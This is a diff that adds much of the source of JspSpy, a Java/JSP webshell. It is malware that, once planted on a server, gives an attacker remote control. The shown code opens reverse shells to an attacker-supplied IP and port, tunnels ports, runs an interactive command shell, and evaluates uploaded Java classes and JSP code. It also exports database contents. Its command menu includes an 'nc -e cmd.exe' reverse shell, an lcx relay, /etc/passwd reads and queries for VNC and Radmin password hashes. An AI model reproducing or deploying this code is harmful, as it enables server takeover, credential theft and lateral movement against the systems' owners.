+					String yourIP = request.getParameter("yourIP");
+					String yourPort = request.getParameter("yourPort");
+					Socket yourS = new Socket();
+					yourS.connect(new InetSocketAddress(yourIP,Integer.parseInt(yourPort)));
+					Socket targetS = new Socket();
+					targetS.connect(new InetSocketAddress(targetIP,Integer.parseInt(targetPort)));
+					StreamConnector.readFromLocal(new DataInputStream(targetS.getInputStream()),new DataOutputStream(yourS.getOutputStream()));
+					StreamConnector.readFromRemote(targetS,yourS,new DataInputStream(yourS.getInputStream()),new DataOutputStream(targetS.getOutputStream()));
+					JSession.setAttribute("done","Port Back Success !");
+					((Invoker)ins.get("vmp")).invoke(request,response,JSession);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class MapPortInvoker extends DefaultInvoker {
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String localIP = request.getParameter("localIP");
+					String localPort = request.getParameter("localPort");
+					final String remoteIP = request.getParameter("remoteIP");
+					final String remotePort = request.getParameter("remotePort");
+					if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort))
+						return;
+					Object obj = JSession.getAttribute(PORT_MAP);
+					if (obj != null) {
+						ServerSocket s = (ServerSocket)obj;
+						s.close();
+					}
+					final ServerSocket server = new ServerSocket();
+					server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort)));
+					JSession.setAttribute(PORT_MAP,server);
+					new Thread(new Runnable(){
+						public void run(){
+							while (true) {
+								Socket soc = null;
+								Socket remoteSoc = null;
+								DataInputStream remoteIn = null;
+								DataOutputStream remoteOut = null;
+								DataInputStream localIn = null;
+								DataOutputStream localOut = null;
+								try{
+									soc = server.accept();
+									remoteSoc = new Socket();
+									remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort)));
+									remoteIn = new DataInputStream(remoteSoc.getInputStream());
+									remoteOut = new DataOutputStream(remoteSoc.getOutputStream());
+									localIn = new DataInputStream(soc.getInputStream());
+									localOut = new DataOutputStream(soc.getOutputStream());
+									StreamConnector.readFromLocal(localIn,remoteOut);
+									StreamConnector.readFromRemote(soc,remoteSoc,remoteIn,localOut);
+								}catch(Exception ex)
+								{								
+									break;
+								}
+							}
+						}
+						
+					}).start();
+					JSession.setAttribute("done","Map Port Success!");
+					JSession.setAttribute("localIP",localIP);
+					JSession.setAttribute("localPort",localPort);
+					JSession.setAttribute("remoteIP",remoteIP);
+					JSession.setAttribute("remotePort",remotePort);
+					JSession.setAttribute(SESSION_O,"vmp");
+					response.sendRedirect(SHELL_NAME);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		//VBackConnect
+		private static class VbcInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					Object ip = JSession.getAttribute("ip");
+					Object port = JSession.getAttribute("port");
+					Object program = JSession.getAttribute("program");
+					Object done = JSession.getAttribute("done");
+					JSession.removeAttribute("ip");
+					JSession.removeAttribute("port");
+					JSession.removeAttribute("program");
+					JSession.removeAttribute("done");
+					if (Util.isEmpty(ip))
+						ip = request.getRemoteAddr();
+					if (Util.isEmpty(port) || !Util.isInteger(port.toString()))
+						port = "53";
+					if (Util.isEmpty(program)) {
+						if (ISLINUX)
+							program = "/bin/bash";
+						else
+							program = "cmd.exe";
+					}
+						
+					if (!Util.isEmpty(done))
+						Util.outMsg(out,done.toString());
+					out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
+					"<input type=\"hidden\" name=\"o\" value=\"backConnect\">"+
+					"  <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+					"  <tr>"+
+					"    <td><h2 id=\"Bin_H2_Title\">Back Connect &gt;&gt;</h2>"+
+					"      <div id=\"hOWTm\">"+
+					"      <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+					"      <tr align=\"center\">"+
+					"        <td style=\"width:5%\"></td>"+
+					"        <td  align=\"center\">Your Ip :"+
+					"          <input name=\"ip\" id=\"ip\" type=\"text\" class=\"input\" size=\"20\" value=\""+ip+"\" />"+
+					"          Your Port :"+
+					"          <input name=\"port\" id=\"port\" type=\"text\" class=\"input\" size=\"20\" value=\""+port+"\" />Program To Back :"+
+					"          <input name=\"program\" id=\"program\" type=\"text\" value=\""+program+"\" class=\"input\" size=\"20\" value=\"d\" /></td>"+
+					"      </tr>"+
+					"      <tr align=\"center\">"+
+					"        <td colspan=\"2\"><br/>"+
+					"          <input type=\"submit\" name=\"FJE\" value=\"Connect\" id=\"FJE\" class=\"bt\" />"+
+					"    </td>"+
+					"    </tr>"+
+					"	</table>"+
+					"    </div>"+
+					"</td>"+
+					"</tr>"+
+					"</table>"+
+					"</form>");
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class BackConnectInvoker extends DefaultInvoker {
+			public boolean doAfter(){return false;}
+			public boolean doBefore(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					String ip = request.getParameter("ip");
+					String port = request.getParameter("port");
+					String program = request.getParameter("program");
+					if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port))
+						return;
+					Socket socket = new Socket(ip,Integer.parseInt(port));
+					Process process = Runtime.getRuntime().exec(program);
+					(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();
+					(new StreamConnector(process.getErrorStream(), socket.getOutputStream())).start();
+					(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
+					JSession.setAttribute("done","Back Connect Success!");
+					JSession.setAttribute("ip",ip);
+					JSession.setAttribute("port",port);
+					JSession.setAttribute("program",program);
+					JSession.setAttribute(SESSION_O,"vbc");
+					response.sendRedirect(SHELL_NAME);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+		private static class JspEnvInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+					"      <tr>"+
+					"        <td><h2 id=\"Ninty_H2_Title\">System Properties &gt;&gt;</h2>"+
+					"          <div id=\"ghaB\">"+
+					"            <hr/>"+
+					"            <ul id=\"Ninty_Ul_Sys\" class=\"info\">");
+					Properties pro = System.getProperties();
+					Enumeration names = pro.propertyNames();
+					while (names.hasMoreElements()){
+						String name = (String)names.nextElement();
+						out.println("<li><u>"+Util.htmlEncode(name)+" : </u>"+Util.htmlEncode(pro.getProperty(name))+"</li>");
+					}
+					out.println("</ul><h2 id=\"Ninty_H2_Mac\">System Environment &gt;&gt;</h2><hr/><ul id=\"Ninty_Ul_Sys\" class=\"info\">");
+					/*
+					Map envs = System.getenv();
+					Set<Map.Entry<String,String>> entrySet = envs.entrySet();
+					for (Map.Entry<String,String> en:entrySet) {
+						out.println("<li><u>"+Util.htmlEncode(en.getKey())+" : </u>"+Util.htmlEncode(en.getValue())+"</li>");
+					}*/
+					out.println("</ul></div></td>"+
+					"      </tr>"+
+					"    </table>");
+				} catch (Exception e) {
+
+					throw e ;
+				}
+			}
+		}
+		private static class ReflectInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					String c = request.getParameter("Class");
+					Class cls = null;
+					try {
+						if (!Util.isEmpty(c))
+							cls = Class.forName(c);
+					} catch (ClassNotFoundException ex) {
+						Util.outMsg(out,"<span style='color:red'>Class "+c+" Not Found ! </span>");
+					}
+					out.println("<form action=\""+SHELL_NAME+"\" id='refForm' method=\"post\">"+
+								"  <input type=\"hidden\" name=\"o\" value=\"reflect\">"+
+								"  <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+								"    <tr>"+
+								"      <td><h2 id=\"Bin_H2_Title\">Java Reflect &gt;&gt;</h2>"+
+								"          <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+								"            <tr>"+
+								"              <td>Class Name : <input name=\"Class\" type=\"text\" class=\"input\" value=\""+(Util.isEmpty(c) ? "java.lang.Object" : c)+"\" size=\"60\"/> "+
+								"              <input type=\"submit\" class=\"bt\" value=\"Reflect\"/></td>"+
+								"            </tr>"+
+								"            "+
+								"          </table>"+
+								"        </td>"+
+								"    </tr>"+
+								"  </table>"+
+								"</form>");
+					
+					if (cls != null) {
+						StringBuffer sb = new StringBuffer();
+						if (cls.getPackage() != null)
+							sb.append("package "+cls.getPackage().getName()+";\n");
+						String n = null;
+						if (cls.isInterface())
+							n = "";
+						//else if (cls.isEnum())
+						//	n = "enum";
+						else
+							n = "class";
+						sb.append(Modifier.toString(cls.getModifiers())+" "+n+" "+cls.getName()+"\n");
+						if (cls.getSuperclass() != null)
+							sb.append("\textends <a href=\"javascript:document.forms['refForm'].elements['Class'].value='"+cls.getSuperclass().getName()+"';document.forms['refForm'].submit()\" style='color:red;'>"+cls.getSuperclass().getName()+"</a>\n");
+						if (cls.getInterfaces() != null && cls.getInterfaces().length != 0) {
+							Class[] faces = cls.getInterfaces();
+							sb.append("\t implements ");
+							for (int i = 0;i<faces.length;i++) {
+								sb.append("<a href=\"javascript:document.forms['refForm'].elements['Class'].value='"+faces[i].getName()+"';document.forms['refForm'].submit()\" style='color:red'>"+faces[i].getName()+"</a>");
+								if (i != faces.length -1) {
+									sb.append(",");
+								}
+							}
+						}
+						sb.append("{\n\t\n");
+						sb.append("\t//constructors..\n");
+						Constructor[] cs = cls.getConstructors();
+						for (int i = 0;i<cs.length;i++) {
+							Constructor cc = cs[i];
+							sb.append("\t"+cc+";\n");
+						}
+						sb.append("\n\t//fields\n");
+						Field[] fs = cls.getDeclaredFields();
+						for (int i =0;i<fs.length;i++) {
+							Field f = fs[i];
+							sb.append("\t"+f.toString()+";");
+							if (Modifier.toString(f.getModifiers()).indexOf("static") != -1) {
+								sb.append("\t//value is : ");
+								f.setAccessible(true);
+								Object obj = f.get(null);
+								sb.append("<span style='color:red'>");
+								if (obj != null)
+									sb.append(obj.toString());
+								else
+									sb.append("NULL");
+								
+								sb.append("</span>");
+							} 
+							sb.append("\n");
+						}
+						
+						sb.append("\n\t//methods\n");
+						Method[] ms = cls.getDeclaredMethods();
+						for (int i =0;i<ms.length;i++) {
+							Method m = ms[i];
+							sb.append("\t"+ m.toString()+";\n");
+						}
+						sb.append("}\n");
+						String m = "<span style='font-weight:normal'>"+Util.highLight(sb.toString()).replaceAll("\t","&nbsp;&nbsp;&nbsp;&nbsp;").replaceAll("\n","<br/>")+"</span>";
+						Util.outMsg(out,m,"left");
+					}
+				} catch (Exception e) {
+					throw e;
+				}
+			}
+		}
+		private static class TopInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+					PrintWriter out = response.getWriter();
+					out.println("<form action=\""+SHELL_NAME+"\" method=\"post\" name=\"doForm\"></form>"+
+					"<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">"+
+					"	<tr class=\"head\">"+
+					"		<td><span style=\"float:right;\"><a href=\"http://www.forjj.com\" target=\"_blank\">JspSpy Ver: 2009 Private </a></span>"+request.getHeader("host")+" (<span id='ip'>"+InetAddress.getLocalHost().getHostAddress()+"</span>) | <a href=\"javascript:if (!window.clipboardData){alert('only support IE!');}else{void(window.clipboardData.setData('Text', document.getElementById('ip').innerText));alert('ok')}\">copy</a></td>"+
+					"	</tr>"+
+					"	<tr class=\"alt1\">"+
+					"		<td><a href=\"javascript:doPost({o:'logout'});\">Logout</a> | "+
+					"			<a href=\"javascript:doPost({o:'fileList'});\">File Manager</a> | "+
+					"			<a href=\"javascript:doPost({o:'vConn'});\">DataBase Manager</a> | "+
+					"			<a href=\"javascript:doPost({o:'vs'});\">Execute Command</a> | "+
+					"			<a href=\"javascript:doPost({o:'vso'});\">Shell OnLine</a> | "+
+					"			<a href=\"javascript:doPost({o:'vbc'});\">Back Connect</a> | "+
+					"			<a href=\"javascript:doPost({o:'reflect'});\">Java Reflect</a> | "+
+					"			<!--<a href=\"javascript:alert('not support yet');\">Http Proxy</a> | -->"+
+					"			<a href=\"javascript:doPost({o:'ev'});\">Eval Java Code</a> | "+
+					"			<a href=\"javascript:doPost({o:'vPortScan'});;\">Port Scan</a> | "+
+					"			<a href=\"javascript:doPost({o:'vd'});\">Download Remote File</a> | "+
+					"			<a href=\"javascript:;doPost({o:'clipboard'});\">ClipBoard</a> | "+
+					"			<a href=\"javascript:doPost({o:'vmp'});\">Port Map</a> | "+
+					"			<a href=\"javascript:doPost({o:'vother'});\">Others</a> | "+
+					"			<a href=\"javascript:doPost({o:'jspEnv'});\">JSP Env</a> "+
+					"	</tr>"+
+					"</table>");
+					if (JSession.getAttribute(MSG) != null) {
+						Util.outMsg(out,JSession.getAttribute(MSG).toString());
+						JSession.removeAttribute(MSG);
+					} 
+					if (JSession.getAttribute(ENTER_MSG) != null) {
+						String outEntry = request.getParameter("outentry");
+						if (Util.isEmpty(outEntry) || !outEntry.equals("true"))
+							Util.outMsg(out,JSession.getAttribute(ENTER_MSG).toString());
+					} 
+									} catch (Exception e) {
+
+					throw e ;
+				}
+			}
+		}
+		private static class VOnLineShellInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+						PrintWriter out = response.getWriter();
+						out.println("<script>"+
+						"				function $(id) {"+
+						"					return document.getElementById(id);"+
+						"				}"+
+						"				var ie = window.navigator.userAgent.toLowerCase().indexOf(\"msie\") != -1;"+
+						"				window.onload = function(){"+
+						"					setInterval(function(){"+
+						"						if ($(\"autoscroll\").checked)"+
+						"						{"+
+						"							var f = window.frames[\"echo\"];"+
+						"							if (f && f.document && f.document.body)"+
+						"							{"+
+						"								if (!ie)"+
+						"								{"+
+						"									if (f.document.body.offsetHeight)"+
+						"									{"+
+						"										f.scrollTo(0,parseInt(f.document.body.offsetHeight)+1);"+
+						"									}"+
+						"								} else {"+
+						"									f.scrollTo(0,parseInt(f.document.body.scrollHeight)+1);"+
+						"								}"+
+						"							}"+
+						"						}"+
+						"					},500);"+
+						"				}"+
+						"			</script>");
+						out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+						"  <tr>"+
+						"    <td>");
+						out.println("<h2>Shell OnLine &raquo;</h2><br/>");
+						out.println("<form action=\""+SHELL_NAME+"\" method=\"post\" target=\"echo\" onsubmit=\"$('cmd').focus()\">"+
+						"			<input type=\"submit\" value=\" start \" class=\"bt\">"+
+						"				<input type=\"text\" name=\"exe\" style=\"width:300px\" class=\"input\" value=\""+(ISLINUX ? "/bin/bash" :"c:\\windows\\system32\\cmd.exe")+"\"/>"+
+						"				<input type=\"hidden\" name=\"o\" value=\"online\"/><input type=\"hidden\" name=\"type\" value=\"start\"/><span class=\"tip\">Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo</span>"+
+						"			</form>"+
+						"			<hr/>"+
+						"				<iframe class=\"secho\" name=\"echo\" src=\"\">"+
+						"				</iframe>"+
+						"				<form action=\""+SHELL_NAME+"\" method=\"post\" onsubmit=\"this.submit();$('cmd').value='';return false;\" target=\"asyn\">"+
+						"					<input type=\"text\" id=\"cmd\" name=\"cmd\" class=\"input\" style=\"width:75%\">"+
+						"					<input name=\"o\" id=\"o\" type=\"hidden\" value=\"online\"/><input type=\"hidden\" id=\"ddtype\" name=\"type\" value=\"ecmd\"/>"+
+						"					<select onchange=\"$('cmd').value = this.value;$('cmd').focus()\">"+
+						"						<option value=\"\" selected> </option>"+
+						"						<option value=\"uname -a\">uname -a</option>"+
+						"						<option value=\"cat /etc/issue\">issue</option>"+
+						"						<option value=\"cat /etc/passwd\">passwd</option>"+
+						"						<option value=\"netstat -an\">netstat -an</option>"+
+						"						<option value=\"net user\">net user</option>"+
+						"						<option value=\"tasklist\">tasklist</option>"+
+						"						<option value=\"tasklist /svc\">tasklist /svc</option>"+
+						"						<option value=\"net start\">net start</option>"+
+						"						<option value=\"net stop policyagent /yes\">net stop</option>"+
+						"						<option value=\"nbtstat -A IP\">nbtstat -A</option>"+
+						"						<option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v \"PortNumber\"'>reg query</option>"+
+						"						<option value='reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters\\\" /v \"Parameter\"'>radmin hash</option>"+
+						"						<option value='reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4\" /v \"password\"'>vnc hash</option>"+
+						"						<option value=\"nc -e cmd.exe 192.168.230.1 4444\">nc</option>"+
+						"						<option value=\"lcx -slave 192.168.230.1 4444 127.0.0.1 3389\">lcx</option>"+
+						"						<option value=\"systeminfo\">systeminfo</option>"+
+						"						<option value=\"net localgroup\">view groups</option>"+
+						"						<option value=\"net localgroup administrators\">view admins</option>"+
+						"					</select>"+
+						"					<input type=\"checkbox\" checked=\"checked\" id=\"autoscroll\">Auto Scroll"+
+						"					<input type=\"button\" value=\"Stop\" class=\"bt\" onclick=\"$('ddtype').value='stop';this.form.submit()\">"+
+						"				</form>"+
+						"			<iframe style=\"display:none\" name=\"asyn\"></iframe>"
+						);
+						out.println("    </td>"+
+						"  </tr>"+
+						"</table>");
+				} catch (Exception e) {
+					throw e ;
+				}
+			}
+		}
+		private static class OnLineInvoker extends DefaultInvoker {
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+						String type = request.getParameter("type");
+						if (Util.isEmpty(type))
+							return;
+						if (type.toLowerCase().equals("start")) {
+							String exe = request.getParameter("exe");
+							if (Util.isEmpty(exe))
+								return;
+							Process pro = Runtime.getRuntime().exec(exe);
+							ByteArrayOutputStream outs = new ByteArrayOutputStream();
+							response.setContentLength(100000000);
+							response.setContentType("text/html;charset="+System.getProperty("file.encoding"));
+							OnLineProcess olp = new OnLineProcess(pro);
+							JSession.setAttribute(SHELL_ONLINE,olp);
+							new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start();
+							new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start();
+							new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();
+							Thread.sleep(1000 * 60 * 60 * 24);
+						} else if (type.equals("ecmd")) {
+							Object o = JSession.getAttribute(SHELL_ONLINE);
+							String cmd = request.getParameter("cmd");
+							if (Util.isEmpty(cmd))
+								return;
+							if (o == null)
+								return;
+							OnLineProcess olp = (OnLineProcess)o;
+							olp.setCmd(cmd);
+						} else {
+							Object o = JSession.getAttribute(SHELL_ONLINE);
+							if (o == null)
+								return;
+							OnLineProcess olp = (OnLineProcess)o;
+							olp.stop();
+						}
+				} catch (Exception e) {
+					
+					throw e;
+				}
+			}
+		}
+		private static class EnterInvoker extends DefaultInvoker {
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				PrintWriter out = response.getWriter();
+				String type = request.getParameter("type");
+				if (!Util.isEmpty(type)) {
+					JSession.removeAttribute(ENTER);
+					JSession.removeAttribute(ENTER_MSG);
+					JSession.removeAttribute(ENTER_CURRENT_DIR);
+					JSession.setAttribute(MSG,"Exit File Success ! ");
+				} else {
+					String f = request.getParameter("filepath");
+					if (Util.isEmpty(f))
+						return;
+					JSession.setAttribute(ENTER,f);
+					JSession.setAttribute(ENTER_MSG,"You Are In File <a style='color:red'>\""+f+"\"</a> Now ! <a href=\"javascript:doPost({o:'enter',type:'exit'})\"> Exit </a>");
+				}
+				response.sendRedirect(SHELL_NAME);
+			}
+		}
+		private static class VExport2FileInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				PrintWriter out = response.getWriter();
+				String type = request.getParameter("type");
+				String sql = request.getParameter("sql");
+				String table = request.getParameter("table");
+				if (Util.isEmpty(sql) && Util.isEmpty(table)) {
+					JSession.setAttribute(SESSION_O,"vConn");
+					response.sendRedirect(SHELL_NAME);
+					return;
+				}
+				out.println("<form action=\"\" method=\"post\">"+
+							"<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+							"  <tr>"+
+							"    <td>"+
+							"    <input type=\"hidden\" name=\"o\" value=\"export\"/>"+
+							"    <input type=\"hidden\" name=\"type\" value=\""+(Util.isEmpty(type) ? "" : type)+"\"/>"+
+							"    <input type=\"hidden\" name=\"sql\" value=\""+(Util.isEmpty(sql) ? "" : sql.replaceAll("\"","&quot;"))+"\"/>"+
+							"    <input type=\"hidden\" name=\"table\" value=\""+(Util.isEmpty(table) ? "" : table)+"\"/>"+
+							"    <h2>Export To File &raquo;</h2>"+
+							"        "+
+							"    <hr/>Export \"<span style='color:red;font-weight:bold'>"+(Util.isEmpty(sql) ? table : sql.replaceAll("\"","&quot;"))+"</span>\" To File : <input type=\"text\" style=\"font-weight:bold\" name=\"filepath\" value=\""+(JSession.getAttribute(CURRENT_DIR).toString()+"/exportdata.txt")+"\" size=\"100\" class=\"input\"/> <input type=\"submit\" class=\"bt\" value=\"Export\"/><br/><br/>"+BACK_HREF+"</td>"+
+							"        </tr>"+
+							"      </table>"+
+							"</form>");
+			}
+		}
+		
+		private static class ExportInvoker extends DefaultInvoker {
+			public boolean doBefore(){return false;}
+			public boolean doAfter(){return false;}
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				String type = request.getParameter("type");
+				String filepath = request.getParameter("filepath");
+				String sql = null;
+				DBOperator dbo = null;
+				dbo = (DBOperator)JSession.getAttribute(DBO);
+
+				if (Util.isEmpty(type)) {
+					//table export
+					String tb = request.getParameter("table");
+					if (Util.isEmpty(tb))
+						return;
+					String s = dbo.getConn().getMetaData().getIdentifierQuoteString();
+					sql = "select * from "+s+tb+s;
+					
+				} else if (type.equals("queryexp")) {
+					//query export
+					sql = request.getParameter("sql");
+					if (Util.isEmpty(sql)) {
+						JSession.setAttribute(SESSION_O,"vConn");
+						response.sendRedirect(SHELL_NAME);
+						return;
+					}
+				}
+				Object o = dbo.execute(sql);
+				ByteArrayOutputStream bout = new ByteArrayOutputStream(); 
+				byte[] rowSep = "\r\n".getBytes();
+				if (o instanceof ResultSet) {
+					ResultSet rs = (ResultSet)o;
+					ResultSetMetaData meta = rs.getMetaData();
+					int count = meta.getColumnCount();
+					for (int i =1;i<=count;i++) {
+						String colName = meta.getColumnName(i)+"\t";
+						byte[] b = colName.getBytes();
+						bout.write(b,0,b.length);
+					}
+					bout.write(rowSep,0,rowSep.length);
+					while (rs.next()) {
+						for (int i =1;i<=count;i++) {
+								String v = null;
+								try {
+									v = rs.getString(i);
+								} catch (SQLException ex) {
+									v = "<<Error!>>";
+								}
+								v += "\t";
+								byte[] b = v.getBytes();
+								bout.write(b,0,b.length);
+						}
+						bout.write(rowSep,0,rowSep.length);
+					}
+					rs.close();
+					ByteArrayInputStream input = new ByteArrayInputStream(bout.toByteArray());
+					BufferedOutputStream output = null;
+					if (!Util.isEmpty(filepath)) {
+						//export2file
+						output = new BufferedOutputStream(new FileOutputStream(new File(filepath)));
+					} else {
+						//download.
+						response.setHeader("Content-Disposition","attachment;filename=DataExport.txt");
+						output = new BufferedOutputStream(response.getOutputStream());
+					}
+					byte[] data = new byte[1024];
+					int len = input.read(data);
+					while (len != -1) {
+						output.write(data,0,len);
+						len = input.read(data);
+					}
+					bout.close();
+					input.close();
+					output.close();
+					if (!Util.isEmpty(filepath)) {
+						JSession.setAttribute(MSG,"Export To File Success !");
+						response.sendRedirect(SHELL_NAME);
+					}
+				} 
+			}
+		}
+		private static class EvalInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				String type = request.getParameter("type");
+				PrintWriter out = response.getWriter();
+				Object msg = JSession.getAttribute(MSG);
+				if (msg != null) {
+					Util.outMsg(out,(String)msg);
+					JSession.removeAttribute(MSG);
+				}
+				if (Util.isEmpty(type)) {
+					out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+					"  <tr>"+
+					"    <td><h2>Eval Java Code &raquo;</h2>"+
+					"<hr/>"+
+					"      <p>"+
+					"      <form action=\""+SHELL_NAME+"?o=eu\" method=\"post\"  enctype=\"multipart/form-data\">"+
+					"UpLoad a Class File : ");
+					Util.outMsg(out,"<pre>"+
+					"<span style='color:blue'>public class</span> SpyEval{\r\n"+
+					"	<span style='color:blue'>static</span> {\r\n"+
+					"		<span style='color:green'>//Your Code Here.</span>\r\n"+
+					"	}\r\n"+
+					"}\r\n"+
+					"</pre>","left");
+					out.println(" <input class=\"input\" name=\"file\" type=\"file\"/> <input type=\"submit\" class=\"bt\" value=\" Eval \"></form><hr/>"+
+					"      <form action=\""+SHELL_NAME+"\"  method=\"post\"><p></p>Jsp Eval : <br/>"+
+					"      <input type=\"hidden\" name=\"o\" value=\"ev\"><input type=\"hidden\" name=\"type\" value=\"jsp\">"+
+					"      <textarea name=\"jspc\" rows=\"15\" cols=\"70\">"+URLDecoder.decode("%3C%25%40page+pageEncoding%3D%22utf-8%22%25%3E%0D%0A%3C%25%0D%0A%2F%2Fyour+code+here.%0D%0Aout.println%28%22create+a+jsp+file+then+include+it+%21+by++ninty%22%29%3B%0D%0A%25%3E","utf-8")+"</textarea>"+
+					"      <br/><input class=\"bt\" name=\"button\" id=\"button\" value=\"Eval\" type=\"submit\" size=\"100\"  />"+
+					"      </form>"+
+					"      </p>"+
+					"    </td>"+
+					"  </tr>"+
+					"</table>");
+				} else if (type.equals("jsp")){
+					String jspc = request.getParameter("jspc");
+					if (Util.isEmpty(jspc))
+						return;
+					File f = new File(SHELL_DIR,"evaltmpninty.jsp");
+					BufferedWriter writer = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f),"utf-8"));
+					writer.write(jspc,0,jspc.length());
+					writer.flush();
+					writer.close();
+					out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+					"  <tr>"+
+					"    <td><h2>Jsp Eval Result &raquo;</h2>");
+					out.println("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:left;font-weight:bold;margin:10px\">");
+					request.getRequestDispatcher("evaltmpninty.jsp").include(request,response);
+					out.println("</div><input type=\"button\" value=\" Back \" class=\"bt\" onclick=\"history.back()\"></td></tr></table> ");
+					f.delete();
+				}
+			}
+		}
+		private static class EvalUploadInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				ByteArrayOutputStream stream = new ByteArrayOutputStream();
+				UploadBean upload = new UploadBean();
+				upload.setTargetOutput(stream);
+				upload.parseRequest(request);
+				
+				if (stream.toByteArray().length == 2) {
+					JSession.setAttribute(MSG,"Please Upload Your Class File ! ");
+					((Invoker)ins.get("ev")).invoke(request,response,JSession);
+					return;
+				}
+				SpyClassLoader loader = new SpyClassLoader();
+				try {
+					Class c = loader.defineClass(null,stream.toByteArray());
+					c.newInstance();
+				}catch(Exception e) {
+				}
+				stream.close();
+				JSession.setAttribute(MSG,"Eval Java Class Done ! ");
+				((Invoker)ins.get("ev")).invoke(request,response,JSession);
+			}
+		}
+		private static class VOtherInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+						PrintWriter out = response.getWriter();
+						Object msg = JSession.getAttribute(MSG);
+						if (msg != null) {
+							Util.outMsg(out,(String)msg);
+							JSession.removeAttribute(MSG);
+						}
+						out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+									"    <tr>"+
+									"      <td><h2 id=\"Bin_H2_Title\">Session Manager&gt;&gt;</h2><hr/>"+
+									"        <div id=\"hOWTm\" style=\"line-height:30px\">"+
+									"        <ul>");
+						Enumeration en = JSession.getAttributeNames();
+						while (en.hasMoreElements()) {
+								Object o = en.nextElement();
+								if (o.toString().equals(MSG))
+									continue;
+								out.println("<li><form action='"+SHELL_NAME+"' method='post'><u>"+o.toString()+"</u> <input type=\"text\" name=\"value\" class=\"input\" size=\"50\" value=\""+JSession.getAttribute(o.toString())+"\">");
+								out.println("<input type='button' class='bt' value='Update' onclick=\"this.form.elements['type'].value='update';this.form.submit()\"> <input type='button' onclick=\"this.form.elements['type'].value='delete';this.form.submit()\" class='bt' value='Delete'/>");
+								out.println("<input type='hidden' name='o' value='sm'/><input type='hidden' name='type'/>");
+								out.println("<input type='hidden' name='name' value='"+o.toString()+"'/>");
+								out.println("</form></li>");
+						}
+						out.println("<li style='list-style:none'><form action='"+SHELL_NAME+"' method='post'><fieldset>"+
+									"<legend>New Session Attribute</legend>"+
+									"name : <input type=\"text\" name=\"name\" value=\"\" class=\"input\"> value : <input type=\"text\""+
+									" name=\"value\" class=\"input\"/> <input type='submit' value='Add' class='bt'><input type='hidden' name='o' value='sm'/><input type='hidden' name='type' value='update'>"+
+									" </fieldset></form></li></ul></div></td>"+
+									"    </tr>"+
+									"  </table>");
